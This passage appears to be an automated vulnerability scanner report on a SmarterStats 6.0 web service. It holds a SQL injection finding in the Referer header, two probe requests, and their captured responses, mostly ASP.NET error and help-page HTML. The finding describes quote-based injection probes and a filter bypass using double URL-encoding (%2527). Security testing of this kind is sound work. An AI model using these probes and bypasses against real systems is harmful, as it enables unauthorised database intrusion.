&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSiteStatus?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSiteStatus HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:40 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19931
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneID:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

